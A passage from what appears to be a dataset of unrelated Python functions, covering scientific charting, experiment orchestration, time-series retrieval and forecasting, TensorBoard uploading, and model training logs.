continuing\n if len(df_all):\n\n # add a point name column to be used in the tooltip.\n df_all['name'] = df_all.index.strftime('%a %m/%d/%y %H:%M')\n\n # add a column identifying whether point is in occupied or unoccupied period.\n resolution = self.occupied_resolution()\n if (self.schedule is None) or (resolution is None):\n # no schedule or data doesn't lend itself to classifying\n # consider all points to be occupied\n df_all['occupied'] = 1\n else:\n df_all['occupied'] = [self.schedule.is_occupied(ts, resolution=resolution) for ts in df_all.ts]\n\n # Set up the parameters for the different series of data\n # Required Info is (starting datetime, ending datetime, occupied status (0 or 1), series name, \n # series color, series symbol, series radius, series zindex).\n now_dt = datetime.now()\n if div_dt:\n # A dividing date was provided by the user.\n div_dt = div_dt.replace(tzinfo=None) # needs to be naive\n ser_params = ( (datetime(1970,1,1), div_dt, 1, 'Prior to %s' % div_datestring, '#2f7ed8', 'circle', 4.5),\n (datetime(1970,1,1), div_dt, 0, 'Prior to %s, Unoccupied' % div_datestring, '#2f7ed8', 'triangle-up', 3),\n (div_dt, now_dt, 1, '%s and beyond' % div_datestring, '#FF0000', 'circle', 4.5),\n (div_dt, now_dt, 0, '%s and beyond, Unoccupied' % div_datestring, '#FF0000', 'triangle-up', 3) )\n else:\n # Divide data by how recent it is.\n ser_params = ( (now_dt - timedelta(days=1), now_dt, 1, 'Last 24 Hours', '#FF0000', 'circle', 4.5),\n (now_dt - timedelta(days=1), now_dt, 0, 'Last 24 Hours, Unoccupied', '#FF0000', 'triangle-up', 3),\n (now_dt - 
timedelta(days=7), now_dt - timedelta(days=1), 1, 'Last 7 Days', '#00CC00', 'circle', 4.5),\n (now_dt - timedelta(days=7), now_dt - timedelta(days=1), 0, 'Last 7 Days, Unoccupied', '#00CC00', 'triangle-up', 3),\n (datetime(1970,1,1), now_dt - timedelta(days=7), 1, '7+ Days Old', '#2f7ed8', 'circle', 4.5),\n (datetime(1970,1,1), now_dt - timedelta(days=7), 0, '7+ Days Old, Unoccupied', '#2f7ed8', 'triangle-up', 3),\n )\n\n for t_start, t_end, occup, ser_name, ser_color, ser_symbol, radius in reversed(ser_params):\n mask = (df_all.index >= t_start) & (df_all.index < t_end) & (df_all.occupied==occup)\n if mask.max():\n series.append( {'x': np.char.mod('%.4g',df_all[mask].X.values).astype(float).tolist(),\n 'y': np.char.mod('%.4g',df_all[mask].Y.values).astype(float).tolist(),\n 'text': df_all[mask].name.values.tolist(),\n 'type': 'scatter',\n 'mode': 'markers', \n 'name': ser_name,\n 'marker': { 'color': ser_color,\n 'symbol': ser_symbol,\n 'size': radius * 2\n }\n } )\n\n # create the X and Y axis labels and the series\n x_label = '%s, %s' % (sensorX.title, sensorX.unit.label)\n y_label = '%s, %s' % (sensorY.title, sensorY.unit.label)\n\n opt = self.get_chart_options('plotly')\n opt['data'] = series\n opt['layout']['title'] = sensorY.title + \" vs. \" + sensorX.title\n opt['layout']['xaxis']['title'] = x_label\n opt['layout']['yaxis']['title'] = y_label\n opt['layout']['legend']['traceorder'] = 'reversed'\n\n html = basechart.chart_config.chart_container_html(opt['layout']['title'])\n\n return {'html': html, 'objects': [('plotly', opt)]}", "def run(self):\n self.timestamp['start'] = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')\n\n for point in self._prepare_grid():\n graph = self._prepare_graph(**point)\n env = self._prepare_env(graph, **point)\n log = self._prepare_logger(graph, env, **point)\n\n try:\n env.run(until=self.runtime)\n except Exception as e:\n print(e)\n log.close()\n\n # self.timestamp[grid.hash_grid_point(point)].append(datetime.datetime.now().strftime('%Y%m%dT%H%M%S'))\n\n self.timestamp['end'] = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')", "def _pre_create_runs_and_time_series(self):\n self._logdir_loader_pre_create.synchronize_runs()\n run_to_events = self._logdir_loader_pre_create.get_run_events()\n if self._run_name_prefix:\n run_to_events = {\n self._run_name_prefix + k: v for k, v in run_to_events.items()\n }\n\n run_names = []\n run_tag_name_to_time_series_proto = {}\n for (run_name, events) in run_to_events.items():\n run_names.append(run_name)\n for event in events:\n _filter_graph_defs(event)\n for value in event.summary.value:\n metadata, is_valid = self._request_sender.get_metadata_and_validate(\n run_name, value\n )\n if not is_valid:\n continue\n if metadata.data_class == summary_pb2.DATA_CLASS_SCALAR:\n value_type = (\n tensorboard_time_series.TensorboardTimeSeries.ValueType.SCALAR\n )\n elif metadata.data_class == summary_pb2.DATA_CLASS_TENSOR:\n value_type = (\n tensorboard_time_series.TensorboardTimeSeries.ValueType.TENSOR\n )\n elif metadata.data_class == summary_pb2.DATA_CLASS_BLOB_SEQUENCE:\n value_type = (\n tensorboard_time_series.TensorboardTimeSeries.ValueType.BLOB_SEQUENCE\n )\n\n run_tag_name_to_time_series_proto[\n (run_name, value.tag)\n ] = tensorboard_time_series.TensorboardTimeSeries(\n display_name=value.tag,\n value_type=value_type,\n plugin_name=metadata.plugin_data.plugin_name,\n plugin_data=metadata.plugin_data.content,\n )\n\n self._one_platform_resource_manager.batch_create_runs(run_names)\n 
self._one_platform_resource_manager.batch_create_time_series(\n run_tag_name_to_time_series_proto\n )", "def _process_results(self):\n self.portfolio.create_backtest_result_dataframe()\n stats = self._show_stats()\n return stats", "def data_combinator(runs, interval):\n\tagg_data = []\n\tfor run in runs:\n\t\tdata = pc.run_info(pc.combine_info(\"/Users/mchronert/Desktop/activities/\"+run), interval)\n\t\tagg_data += data\n\treturn agg_data", "def create_analysis():\n \n date_now = datetime.now()\n for analysis in Analysis.objects.filter(activated=True):\n\t\n\tif analysis.last_report == None or analysis.last_report <= date_now - timedelta( seconds=PERIOD_CHOICES[analysis.interval]):\n\t \n\t if analysis.last_report != None and analysis.interval == 'n':\n\t\tcontinue\n\t \n\t results = []\n\t for report in analysis.queries.filter(activated=True):\n\t\t\n\t\tif analysis.date_from != None and analysis.date_to != None:\n\t\t report_results = ReportResult.objects.filter(report=report, run_date__lte=analysis.date_to, run_date__gte=analyses.date_from).order_by('run_date') \n\t\telif analysis.date_from == None and analysis.date_to != None:\n\t\t report_results = ReportResult.objects.filter(report=report, run_date__lte=analysis.date_to).order_by('run_date')\n\t\telif analysis.date_from != None and analysis.date_to == None:\n\t\t report_results = ReportResult.objects.filter(report=report, run_date__gte=analyses.date_from).order_by('run_date')\n\t\telse:\n\t\t report_results = ReportResult.objects.filter(report=report).order_by('run_date')\n\t\t\n\t\t# create output from mongo output\n\t\toutput_result = OutputResult(report=report.title)\n\t\toutput_result.date_array = []\n\t\toutput_result.output_array = []\n\t\tprint \"\\n KOLIK: \"+ str(output_result.output_array)\n\t\tfor result in report_results:\n\t\t output_result.date_array.append(result.run_date)\n\t\t #print result.output\n\t\t #print \"\\nouttest: \"+str(output_result.output_array)\n\t\t mongo_output = OutputMongo(result.output)\n\t\t output_result.output_array.append(mongo_output.getoutput())\n\n\t\tprint \"out: \",output_result.output_array\n\t\tresults.append(output_result) \n\n\n\t #print results[0].output_array\n\t #print \"\\n\\n\"\n\t #print results[1].output_array\n\t # process outputs\n\t if not process_output_reports(results, analysis, date_now):\n\t\tprint \"Error in execute analysis: %s\" % (analysis.title)\n\t\tcontinue\n\t \n\t if analysis.interval != 'n':\n\t\tif analysis.date_to != None:\n\t\t analysis.date_to = analysis.date_to + timedelta( seconds=PERIOD_CHOICES[analysis.interval])\n\t\tif analysis.date_from != None:\n\t\t analysis.date_from = analysis.date_from + timedelta( seconds=PERIOD_CHOICES[analysis.interval])\n\t\t \n return True", "def process():", "def tasks(self):\n args = Namespace(rev=self.rev)\n data = run_query('push_results', args)['data']\n\n tasks = []\n for kwargs in data:\n # Do a bit of data sanitization.\n if any(a not in kwargs for a in ('label', 'duration', 'result', 'classification')):\n continue\n\n if kwargs['duration'] <= 0:\n continue\n\n tasks.append(Task(**kwargs))\n\n return tasks", "def retrieve_multiple_time_series(self,run='latest',run_data=None,criteria={},timestep='daily',name_fn=name_element_variable):\n if timestep==\"daily\":\n suffix = \"\"\n else:\n suffix = \"/aggregated/%s\"%timestep\n\n if run_data is None:\n run_data = self.retrieve_run(run)\n\n retrieved={}\n def name_column(result):\n col_name = name_fn(result)\n if col_name in retrieved:\n i = 1\n alt_col_name = '%s 
%d'%(col_name,i)\n while alt_col_name in retrieved:\n i += 1\n alt_col_name = '%s %d'%(col_name,i)\n col_name = alt_col_name\n return col_name\n\n units_store = {}\n for result in run_data['Results']:\n if self.result_matches_criteria(result,criteria):\n d = self.retrieve_json(result['TimeSeriesUrl']+suffix)\n result.update(d)\n col_name = name_column(result)\n# raise Exception(\"Duplicate column name: %s\"%col_name)\n if 'Events' in d:\n retrieved[col_name] = d['Events']\n units_store[col_name] = result['Units']\n else:\n all_ts = d['TimeSeries']\n for ts in all_ts:\n col_name = name_column(ts)\n units_store[col_name] = ts['Units']\n\n vals = ts['Values']\n s = self.parse_veneer_date(ts['StartDate'])\n e = self.parse_veneer_date(ts['EndDate'])\n if ts['TimeStep']=='Daily':\n f='D'\n elif ts['TimeStep']=='Monthly':\n f='M'\n elif ts['TimeStep']=='Annual':\n f='A'\n dates = pd.date_range(s,e,freq=f)\n retrieved[col_name] = [{'Date':d,'Value':v} for d,v in zip(dates,vals)]\n # Multi Time Series!\n\n result = self._create_timeseries_dataframe(retrieved)\n for k,u in units_store.items():\n result[k].units = u\n\n return result", "def run_methods(self):\n try:\n # dictionaries of population time series\n self.batch_exponential()\n except Exception as e:\n print(str(e))", "def run_all(self):\n return self.final_fof_rdd", "def collect_data(self):\n exp_conf: ec.ExperimentConfiguration\n # Disabled multiprocess run because of huge memory usage\n processes_number = 1 # self._campaign_configuration['General']['j']\n if processes_number == 1:\n self._logger.info(\"-->Evaluate experiments (sequentially)\")\n for exp_conf in tqdm.tqdm(self._exp_confs, dynamic_ncols=True):\n exp_conf.evaluate()\n if bool(self._campaign_configuration['General']['generate_plots']):\n exp_conf.generate_plots()\n self._logger.info(\"<--\")\n else:\n self._logger.info(\"-->Evaluate experiments (in parallel)\")\n pool = multiprocessing.Pool(processes_number)\n self._exp_confs = list(tqdm.tqdm(pool.imap(evaluate_wrapper, self._exp_confs), total=len(self._exp_confs)))\n if bool(self._campaign_configuration['General']['generate_plots']):\n pool = multiprocessing.Pool(processes_number)\n self._exp_confs = list(tqdm.tqdm(pool.imap(plot_wrapper, self._exp_confs), total=len(self._exp_confs)))\n self._logger.info(\"<--\")\n\n self.raw_results = {}\n for exp_conf in self._exp_confs:\n self.raw_results[tuple(exp_conf.get_signature())] = exp_conf.mapes", "def experiment_callback(self, args):\n # If args is None, that means that an exception was raised during the\n # execution of the experiment. 
In such case, ignore it\n if not args:\n self.n_fail += 1\n return\n # Extract parameters\n params, results, duration = args\n self.n_success += 1\n # Store results\n self.results.add(params, results)\n self.exp_durations.append(duration)\n if self.n_success % self.summary_freq == 0:\n # Number of experiments scheduled to be executed\n n_scheduled = self.n_exp - (self.n_fail + self.n_success)\n # Compute ETA\n n_cores = min(mp.cpu_count(), self.n_proc)\n mean_duration = sum(self.exp_durations) / len(self.exp_durations)\n eta = timestr(n_scheduled * mean_duration / n_cores, False)\n # Print summary\n logger.info('SUMMARY | Completed: %d, Failed: %d, Scheduled: %d, ETA: %s',\n self.n_success, self.n_fail, n_scheduled, eta)", "async def _get_data(self):\n coros = []\n results = []\n for series_ids in self.series_ids:\n response = self._post(data={\"series_id\": series_ids})\n coros.append(response)\n if len(coros) == 5: # throttle at 5\n _ = await asyncio.gather(*coros)\n results.extend(_)\n coros = [] # Reset accumulator\n if coros:\n results.extend(await asyncio.gather(*coros))\n\n return filter(None, results)", "def process(self):", "def process(self):", "def process(self):", "async def wrap_up_processing_reports(self):\n if hasattr(Config(), 'results'):\n new_row = []\n for item in self.recorded_items:\n item_value = {\n 'global_round':\n self.current_global_round,\n 'round':\n self.current_round,\n 'accuracy':\n self.accuracy * 100,\n 'average_accuracy':\n self.average_accuracy * 100,\n 'edge_agg_num':\n Config().algorithm.local_rounds,\n 'local_epoch_num':\n Config().trainer.epochs,\n 'training_time':\n max([\n report.training_time for (report, __) in self.updates\n ]),\n 'round_time':\n time.perf_counter() - self.round_start_time\n }[item]\n new_row.append(item_value)\n\n if Config().is_edge_server():\n result_csv_file = f'{Config().result_dir}result_{Config().args.id}.csv'\n else:\n result_csv_file = f'{Config().result_dir}result.csv'\n\n csv_processor.write_csv(result_csv_file, new_row)\n\n if Config().is_edge_server():\n # When a certain number of aggregations are completed, an edge client\n # needs to be signaled to send a report to the central server\n if self.current_round == Config().algorithm.local_rounds:\n logging.info(\n '[Server #%d] Completed %s rounds of local aggregation.',\n os.getpid(),\n Config().algorithm.local_rounds)\n self.model_aggregated.set()\n\n self.current_round = 0\n self.new_global_round_begins.clear()\n # Wait until a new global round begins\n # to avoid selecting clients before a new global round begins\n await self.new_global_round_begins.wait()", "def postExecution(self):\n\n casalog.origin(\"ParallelDataHelper\") \n if self._msTool:\n self._msTool.close()\n \n # We created a data directory and many SubMSs,\n # now build the reference MS. 
The outputList is a\n # dictionary of the form:\n # {'path/outputvis.data/SUBMSS/outputvis.0000.ms':True,\n # 'path/outuputvis.data/SUBMSS/outputvis.0001.ms':False}\n outputList = {}\n \n# if (ParallelTaskHelper.getBypassParallelProcessing()==1):\n if (self._cluster == None):\n # This is the list of output SubMSs\n outputList = self._sequential_return_list\n self._sequential_return_list = {}\n elif (self._cluster != None):\n command_response_list = self._cluster.get_command_response(self._command_request_id_list,True,True)\n # Format list in the form of vis dict\n for command_response in command_response_list:\n outvis = command_response['parameters']['outputvis']\n outputList[outvis] = command_response['ret']\n \n \n # List of failed MSs. TBD\n nFailures = []\n \n subMSList = []\n\n nFailures = [v for v in outputList.values() if v == False]\n \n for subMS in outputList:\n # Only use the successful output MSs\n if outputList[subMS]:\n subMSList.append(subMS)\n \n subMSList.sort()\n\n if len(subMSList) == 0:\n casalog.post(\"Error: no subMSs were successfully created.\", 'WARN')\n return False\n \n # When separationaxis='scan' there is no need to give ddistart. \n # The tool looks at the whole spw selection and\n # creates the indices from it. After the indices are worked out, \n # it applies MS selection. We do not need to consolidate either.\n \n # If axis is spw, give a list of the subMSs\n # that need to be consolidated. This list is pre-organized\n # inside the separation functions above.\n \n # Only when input is MS or MS-like and createmms=True\n # Only partition and mstransform have the createmms parameter\n if self._arg.has_key('createmms') and self._arg['createmms'] == True and self._arg['separationaxis'] == 'spw':\n# if (self._arg['separationaxis'] == 'spw' or \n# self._arg['separationaxis'] == 'auto'): \n# if (self._arg['separationaxis'] == 'spw'): \n \n casalog.post('Consolidate the sub-tables')\n \n toUpdateList = self.__ddidict.values()\n \n toUpdateList.sort()\n casalog.post('List to consolidate %s'%toUpdateList,'DEBUG')\n \n # Consolidate the spw sub-tables to take channel selection\n # or averages into account.\n mtlocal1 = mttool()\n try: \n mtlocal1.mergespwtables(toUpdateList)\n mtlocal1.done()\n except Exception, instance:\n mtlocal1.done()\n casalog.post('Cannot consolidate spw sub-tables in MMS','SEVERE')\n return False\n\n if len(nFailures) > 0:\n casalog.post('%s subMSs failed to be created. 
This is not an error, if due to selection when creating a Multi-MS'%len(nFailures))\n # need to rename/re-index the subMSs\n newList = copy.deepcopy(subMSList)\n idx = 0\n for subms in newList:\n suffix = re.findall(r\".\\d{4}.ms\",subms)\n# newms = subms.rpartition(suffix[-1])[0] \n newms = subms[:-len(suffix[-1])]\n newms = newms+'.%04d.ms'%idx\n os.rename(subms,newms)\n newList[idx] = newms\n idx += 1\n\n \n if len(subMSList) == len(newList):\n subMSList = newList\n \n # Get the first subMS to be the reference when\n # copying the sub-tables to the other subMSs \n mastersubms = subMSList[0]\n\n # Get list of all subtables in a subms\n thesubtables = ph.getSubtables(mastersubms)\n \n # Remove the SOURCE and HISTORY tables, which will be the only copied.\n # All other sub-tables will be linked to first subms\n thesubtables.remove('SOURCE')\n thesubtables.remove('HISTORY')\n\n subtabs_to_omit = thesubtables\n \n # Parallel axis to write to table.info of MMS\n # By default take the one from the input MMS\n parallel_axis = ph.axisType(self.__args['vis'])\n if self._arg.has_key('createmms') and self._arg['createmms'] == True:\n parallel_axis = self._arg['separationaxis']\n\n if parallel_axis == 'auto' or parallel_axis == 'both':\n parallel_axis = 'scan,spw'\n \n # Copy sub-tables from first subMS to the others. The tables in\n # subtabs_to_omit are linked instead of copied.\n casalog.post(\"Finalizing MMS structure\")\n ph.makeMMS(self._arg['outputvis'], subMSList,\n True, # copy subtables (will copy only the SOURCE and HISTORY tables)\n subtabs_to_omit, # omitting these\n parallel_axis\n )\n \n thesubmscontainingdir = os.path.dirname(subMSList[0].rstrip('/'))\n \n shutil.rmtree(thesubmscontainingdir)\n \n # Sanity check on the just created MMS\n # check for broken symlinks\n try:\n with open(os.devnull, 'w') as null:\n p = subprocess.Popen(['find', '-L', self._arg['outputvis'], '-type', 'l'],\n universal_newlines=True, stdout=subprocess.PIPE, stderr=null)\n o, e = p.communicate()\n if o:\n casalog.post('The new MMS contain broken symlinks. 
Please verify', 'SEVERE')\n casalog.post(o, 'SEVERE')\n return False\n except:\n pass\n\n return True", "def run(self) -> Any:\n self.prepare()\n for step in self.stream:\n self.output = step\n return self.output", "def run_once(self):\n # Track some statistics about artifacts in a summary object.\n summary = collections.Counter()\n\n for source in self.sources:\n # Run the source to collect artifacts.\n self.logger.info(f\"Running source '{source}'\")\n try:\n # get the generator of onions\n onions = self.sources[source].run()\n except Exception as e:\n self.logger.error(e)\n self.logger.error(traceback.print_exc())\n continue\n\n # Process onions with each operator.\n for operator in self.operators:\n self.logger.info(f\"Processing found onions with operator '{operator}'\")\n try:\n self.operators[operator].process(onions)\n # Save the source onion with collected data\n except Exception as e:\n self.logger.error(e)\n self.logger.error(traceback.print_exc())\n continue\n\n\n\n# # Record stats and update the summary.\n# types = artifact_types(doc.get('interestingKeywords'))\n# summary.update(types)\n# for artifact_type in types:\n# self.logger.info(f'types[artifact_type]')\n\n # Log the summary.\n self.logger.info(f\"New artifacts: {dict(summary)}\")", "def run(self, refresh=True):\n\n progress = Progress(\n \"[progress.description]{task.description}\",\n TextColumn(\"[bold green]{task.fields[measures]}\", justify=\"right\"),\n TextColumn(\n \"[dark_goldenrod]Truncated CM {task.fields[conf_matrix]}\",\n justify=\"right\",\n ),\n BarColumn(),\n \"[progress.percentage]{task.percentage:>3.0f}%\",\n TimeRemainingColumn(),\n auto_refresh=False,\n )\n\n logname = self.args.logname\n print(\"Log stored at: \", logname)\n run = wandb.init(\n project=\"information-obfuscation\",\n entity=\"peiyuanl\",\n name=logname,\n config=vars(self.args),\n )\n dirname = os.path.join(\n \"../checkpoints\",\n self.args.experiment,\n self.args.task,\n self.args.model,\n logname,\n )\n Path(dirname).mkdir(parents=True, exist_ok=True)\n\n with progress:\n gender_adv_tasks = []\n age_adv_tasks = []\n occupation_adv_tasks = []\n\n # To ensure layout correctness\n\n gender_task = progress.add_task(\n \"[cyan]Gender Task\",\n total=self.args.num_epochs,\n measures={},\n conf_matrix=[],\n )\n for name in self.get_ordered_adversary_names():\n gender_adv_tasks.append(\n progress.add_task(\n f\"[cyan]Gender {name} Adversary\",\n total=self.args.finetune_epochs,\n measures={},\n conf_matrix=[],\n )\n )\n\n age_task = progress.add_task(\n \"[cyan]Age Task\",\n total=self.args.num_epochs,\n measures={},\n conf_matrix=[],\n )\n for name in self.get_ordered_adversary_names():\n age_adv_tasks.append(\n progress.add_task(\n f\"[cyan]Age {name} Adversary\",\n total=self.args.finetune_epochs,\n measures={},\n conf_matrix=[],\n )\n )\n\n occupation_task = progress.add_task(\n \"[cyan]Occupation Task\",\n total=self.args.num_epochs,\n measures={},\n conf_matrix=[],\n )\n\n for name in self.get_ordered_adversary_names():\n occupation_adv_tasks.append(\n progress.add_task(\n f\"[cyan]Age {name} Adversary\",\n total=self.args.finetune_epochs,\n measures={},\n conf_matrix=[],\n )\n )\n\n self.train_task_with_adversary(\n \"gender\",\n dirname,\n refresh=refresh,\n progress=progress,\n task=gender_task,\n adv_tasks=gender_adv_tasks,\n )\n self.train_task_with_adversary(\n \"age\",\n dirname,\n refresh=refresh,\n progress=progress,\n task=age_task,\n adv_tasks=age_adv_tasks,\n )\n self.train_task_with_adversary(\n \"occupation\",\n 
dirname,\n refresh=refresh,\n progress=progress,\n task=occupation_task,\n adv_tasks=occupation_adv_tasks,\n )\n\n trained_model_artifact = wandb.Artifact(\n logname + \"_model\", type=\"model\", description=\"Task and adversary models\"\n )\n trained_model_artifact.add_dir(dirname)\n run.log_artifact(trained_model_artifact)\n\n dataset_artifact = wandb.Artifact(\n logname + \"_dataset\",\n type=\"dataset\",\n description=\"Dataset used to train the models\",\n )\n dataset_artifact.add_dir(MOVIELENS_1M_DIR)\n run.log_artifact(dataset_artifact)", "async def run(self):\n\n\t\tawait asyncio.sleep(self.delay)\n\t\tR_load = self.lock.mag/(self.sense - self.lock.mag)*self.R_ref\n\t\tawait self.resistance.push(R_load)\n\t\tawait self.current.push(self.lock.dc/(self.R_ref+R_load))\n\t\tawait self.voltage.push(self.lock.dc*R_load/(self.R_ref+R_load))\n\n\t\tlogger.debug(\"Stream has filled {} of {} points\".format(self.resistance.points_taken,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.resistance.num_points() ))\n\n\t\t#await asyncio.sleep(2*self.integration_time) # Give the filters some time to catch up?", "def add_series_by_search_result(self, result):\n return (yield self.add_series_by_id(result.id))", "def main():\r\n\r\n # Pre-pandemic period\r\n # Step 1 (might take 2-3 mins to categorise 16724 records)\r\n pre = RQ2('../csv_files/precovid_filtered.csv')\r\n pre.cateActions()\r\n\r\n # Step 2\r\n for detail in pre.li_detail[:10]:\r\n print(detail)\r\n plot_lev(pre.od)\r\n\r\n # Step 3\r\n df_new_fixed_pre = manFix(pre.df_new,option='precovid')\r\n\r\n # Step 4 \r\n li_pre_final = cal_group_actions(df_new_fixed_pre,option='precovid')\r\n\r\n # ================================================================\r\n # Post-pandemic period\r\n # Step 1 (might take 2-3 mins to categorise 25827 records)\r\n post = RQ2('../csv_files/postcovid_filtered.csv')\r\n post.cateActions()\r\n\r\n # Step 2 is similar to pre-pandemic period (commented to keep the result clear)\r\n # for detail in post.li_detail[:10]:\r\n # print(detail)\r\n\r\n # Step 3\r\n df_new_fixed_post = manFix(post.df_new, option='postcovid')\r\n\r\n # Step 4 \r\n li_post_final = cal_group_actions(df_new_fixed_post,option='postcovid')\r\n\r\n # ================================================================\r\n # Step 5\r\n meanTest(li_pre_final,li_post_final)\r\n\r\n # Step 6\r\n li_merge = li_pre_final + li_post_final\r\n boxplot(li_merge)", "def run(self):\n # Convert the dataset, index: Recovered, column: log10(Susceptible)\n sr_df = self.sr_df.copy()\n sr_df[self.S] = np.log10(sr_df[self.S].astype(np.float64))\n df = sr_df.pivot_table(index=self.R, values=self.S, aggfunc=\"last\")\n # Convert index to serial numbers\n serial_df = pd.DataFrame(np.arange(1, df.index.max() + 1, 1))\n serial_df.index += 1\n df = pd.merge(\n df, serial_df, left_index=True, right_index=True, how=\"outer\"\n )\n series = df.reset_index(drop=True).iloc[:, 0]\n series = series.interpolate(limit_direction=\"both\")\n # Sampling to reduce run-time of Ruptures\n samples = np.linspace(\n 0, series.index.max(), len(self.sr_df), dtype=np.int64\n )\n series = series[samples]\n # Detection with Ruptures\n algorithm = rpt.Pelt(model=\"rbf\", jump=2, min_size=self.min_size)\n results = algorithm.fit_predict(series.values, pen=0.5)\n # Convert index values to Susceptible values\n reset_series = series.reset_index(drop=True)\n reset_series.index += 1\n susceptible_df = reset_series[results].reset_index()\n # Convert Susceptible values to dates\n df = pd.merge_asof(\n 
susceptible_df.sort_values(self.S),\n sr_df.reset_index().sort_values(self.S),\n on=self.S, direction=\"nearest\"\n )\n found_list = df[self.DATE].sort_values()[:-1]\n # Only use dates when the previous phase has more than {min_size + 1} days\n delta_days = timedelta(days=self.min_size)\n first_obj = self.to_date_obj(self.dates[0])\n last_obj = self.to_date_obj(self.dates[-1])\n effective_list = [first_obj]\n for found in found_list:\n if effective_list[-1] + delta_days < found:\n effective_list.append(found)\n # The last change date must be under the last date of records {- min_size} days\n if effective_list[-1] >= last_obj - delta_days:\n effective_list = effective_list[:-1]\n # Set change points\n self._change_dates = [\n date.strftime(self.DATE_FORMAT) for date in effective_list[1:]\n ]\n return self", "def main(args):\n ###This Variable declares how many days should be forecasted\n ###And if Plots are shown###################################\n if len(args) > 0 and len(args) < 5:\n FutureCast = int(args[0])\n showAnalyzedData = bool(args[1])\n showForecastPlots = bool(args[2])\n prophetIncluded = bool(args[3])\n else:\n FutureCast = 10\n showAnalyzedData = True\n showForecastPlots = True\n prophetIncluded = True\n ############################################################\n ############################################################\n \n # Window to chose german state to analyze\n window = ControllerMVC()\n state = window.run()\n # Builds Connection to redis server\n try:\n redisDB = RedisClient(_state=state)\n except Exception as generalError:\n print(f\"Somethin went wrong connecting to redis: {generalError}\")\n return\n\n # Fetching data and storing in redis Server\n try:\n redisDB.fillRedisDatabase()\n except Exception as generalError:\n print(f\"Somethin went wrong: {generalError}\")\n return\n \n if showAnalyzedData == True:\n AnObj = AnalyzeCorona(redisDB)\n AnObj.coronaPeaksIncident()\n AnObj.averageCoronaIncident()\n\n HWTitel = \"Holt Winter's Exponenial Smoothing\"\n FFTTitel = \"Fast Fourier Transformation\"\n SARIMATitel = \"SARIMA machine learning\"\n FBProphetTitel = \"FB Prophet Forecast\"\n\n # Create objects and call forecast function\n\n HWObj = HWForecast(redisDB, FutureCast, HWTitel)\n HWObj.getForecast()\n\n fourierTransObj = FourierForecast(redisDB, FutureCast, FFTTitel)\n fourierTransObj.getForecast()\n\n sarimaObj = SARIMAForecast(redisDB, FutureCast, SARIMATitel)\n sarimaObj.getForecast()\n\n if prophetIncluded == True:\n fbProphetObj = FbProphetForecast(redisDB, FutureCast, FBProphetTitel)\n fbProphetObj.getForecast()\n\n if showForecastPlots == True:\n # Create subplots for forecasting methods\n fig, ax = plt.subplots(3)\n HWObj.showResult(ax,0)\n fourierTransObj.showResult(ax,1)\n sarimaObj.showResult(ax,2)\n # To prevent overlaping of titels\n plt.tight_layout()\n plt.show()\n \n ###########################################Unittests Section\n ############################################################ \n testAbstractFr = TestAbstractForecast()\n testAbstractFr.run()\n testRedisCli = TestRedisClient()\n testRedisCli.run()\n ############################################################\n ############################################################ \n #redisDB.flushDB()", "def processData(self):\n recordSet = AresChartsService.toMultiSeries(self.vals, self.chartKeys, self.selectedX , self.chartVals, extKeys=self.extKeys)\n self.aresObj.jsGlobal.add(\"data_%s = %s\" % (self.htmlId, json.dumps(recordSet)))", "def total_fire_power_time_series_par(files, 
bounding_box):\n \n assert isinstance(bounding_box, BoundingBox)\n bb = bounding_box\n \n results = {}\n with get_context('spawn').Pool() as pool:\n \n vals = pool.map(_process_single_fire_power_time_series, zip(files, itertools.repeat(bb)))\n vals = (val for val in vals if val is not None)\n \n for time, val, fname in vals:\n results[time] = (val, fname)\n \n return results", "def execute_process(self):\n # ciclo con la ejecucion rr para llenar el quantum\n self.execute_until_quantum_is_over()\n\n # gestion de las colas\n if self.execution[\"remainingtime\"] == 0:\n self.queue_done.append(self.execution)", "def run():\n\n import matplotlib.pyplot as plt\n\n anomalies_t = []\n anomalies_v = []\n anomalies_c = []\n\n all_t = []\n all_v = []\n\n rows = []\n for i, row in dataSet.iterrows():\n\n inputData = row.to_dict()\n\n detectorValues = handleRecord(inputData)\n\n if (detectorValues[0] > 0.65):\n anomalies_t.append(inputData[\"timestamp\"])\n anomalies_v.append(inputData[\"value\"])\n anomalies_c.append(detectorValues[0])\n\n all_t.append(inputData[\"timestamp\"])\n all_v.append(inputData[\"value\"])\n\n outputRow = list(row) + list(detectorValues)\n\n rows.append(outputRow)\n\n # Progress report\n if (i % 1000) == 0:\n print \".\",\n sys.stdout.flush()\n\n fig, ax = plt.subplots()\n\n ax.plot(all_t, all_v)\n ax.plot(anomalies_t, anomalies_v, 'ro')\n\n plt.show()\n\n ans = pandas.DataFrame(rows)\n return ans", "def run(self):\n\n def stop(result):\n if isinstance(result, Exception):\n self.error = result\n self.stop()\n #for e in events[0:100]:\n # print(e)\n dt = (self.stopped-self.started)*1000\n print(\"Took {}ms\".format(dt))\n #print(\"Events: {}\").format(len(events))\n if self.profile:\n stats = pstats.Stats(self.profiler)\n for sort in ['tottime','cumtime']:\n stats.sort_stats(sort)\n stats.print_stats(0.1)\n\n self.done.then(stop)\n self.deferred_call(self.show_view)\n self.start()\n if self.error:\n raise self.error", "def visualize(self):\n NUM_AFFINITY = 4\n NUM_WILL = 7\n\n # Colors for the tasks and categories\n COLORS = d3['Category20c'][20] + d3['Category20b'][20]\n COLORS_CAT = d3['Category20'][20]\n COLORS_AFFINITY = brewer['Greens'][NUM_AFFINITY]\n COLORS_WILL = brewer['RdBu'][NUM_WILL]\n\n # Date range for the figure title\n start_str = c.START.strftime(\"%A %m/%d/%y\")\n end_str = c.END.strftime(\"%A %m/%d/%y\")\n\n # Day of week range for the x axis\n start_weekday_str = c.START.strftime(\"%a\")\n end_weekday_str = c.END.strftime(\"%a\")\n\n times, tasks = self.array.nonzero()\n day_start = tutil.DAY_START\n hours = (times % tutil.SLOTS_PER_DAY) / tutil.SLOTS_PER_HOUR\n bottom = day_start + hours\n top = bottom + (0.95 / tutil.SLOTS_PER_HOUR)\n left = np.floor(times / tutil.SLOTS_PER_DAY)\n right = left + 0.75\n chunk_min = [self.task_chunk_min[j] for j in tasks]\n chunk_max = [self.task_chunk_max[j] for j in tasks]\n affinity_cog_task = [self.task_cognitive_load[j] for j in tasks]\n affinity_cog_slot = [c.AFFINITY_COGNITIVE[i] for i in times]\n affinity_cognitive = (np.array(affinity_cog_task) * np.array(\n affinity_cog_slot)).tolist()\n willpower_task = [self.task_willpower_load[j] for j in tasks]\n willpower_cumulative = np.cumsum(willpower_task)\n duration = [self.task_duration[j] for j in 